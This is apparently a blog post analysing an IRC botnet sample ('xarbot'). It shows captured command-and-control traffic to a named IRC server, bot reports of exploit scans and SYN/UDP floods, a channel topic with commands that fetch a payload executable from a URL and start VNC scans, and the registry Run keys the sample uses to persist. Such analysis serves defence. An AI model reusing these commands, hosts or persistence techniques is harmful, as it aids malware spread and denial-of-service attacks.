shv4.ath.cx

shv4.ath.cx:6667

NICK USA|7008
USER rzec 0 0 :USA|7008
USERHOST USA|7008
MODE USA|7008 -x+i
JOIN #bote2
MODE #bote2 +snt
NOTICE USA|7008 :.VERSION mIRC v6.14 Khaled Mardam-Bey.
PRIVMSG #bote2 :[MAIN]: Status: Ready. Bot Uptime: 0d 0h 0m.
PRIVMSG #bote2 :[MAIN]: Bot ID: [.:xarbot:.].
PRIVMSG #bote2 :[SCAN]: Exploit Statistics: VNC: 0, dcom2-135: 0, dcom2-445: 0, Total: 0 in 0d 0h 0m.
PRIVMSG #bote2 :[MAIN]: Uptime: 0d 0h 2m.
PRIVMSG #bote2 :[PROC]: Failed to terminate process: PROCESS_NAME_TO_TERMINATE
PRIVMSG #bote2 :[HTTPD]: Server listening on IP: 127.0.0.1:8085, Directory: .
PRIVMSG #bote2 :[SYN]: Done with flood (0KB/sec).
PRIVMSG #bote2 :[SYN]: Flooding: (127.0.0.2:1234) for 50 seconds.
PRIVMSG #bote2 :[UDP]: Sending 40 packets to: 127.0.0.2. Packet size: 50, Delay: 60(ms).
PRIVMSG #bote2 :[UDP]: Finished sending packets to 127.0.0.2.
NICK USA|2508
USER wbpuw 0 0 :USA|2508
USERHOST USA|2508
MODE USA|2508 -x+i
NICK USA|7690
USER kpcrsi 0 0 :USA|7690
USERHOST USA|7690
MODE USA|7690 -x+i

Now talking in #bote2
Topic On: [ #bote2 ] [ .msn | .rarinject | .vnc http://nv.com.au/es-facebook/es/face/postal.exe | .scan vnc 100 5 999 -r ]
Topic By: [ shv4 ]
Modes on: [ #bote2 ] [ +sntrQCuG ]

* The following ports were open in the system:

Port Protocol Process
113 TCP msconf.exe (%System%msconf.exe)
1034 UDP msconf.exe (%System%msconf.exe)
1178 TCP msconf.exe (%System%msconf.exe)
1181 TCP msconf.exe (%System%msconf.exe)
8085 TCP msconf.exe (%System%msconf.exe)

Registry Modifications

* The following Registry Key was created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ msconfigg = “msconf.exe”

so that msconf.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices]
+ msconfigg = “msconf.exe”

so that msconf.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
+ msconfigg = “msconf.exe”

so that msconf.exe runs every time Windows starts

* The following Registry Values were modified:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle]
+ EnableDCOM =
o [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsa]
+ restrictanonymous =
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
+ restrictanonymous =

Categories: Uncategorized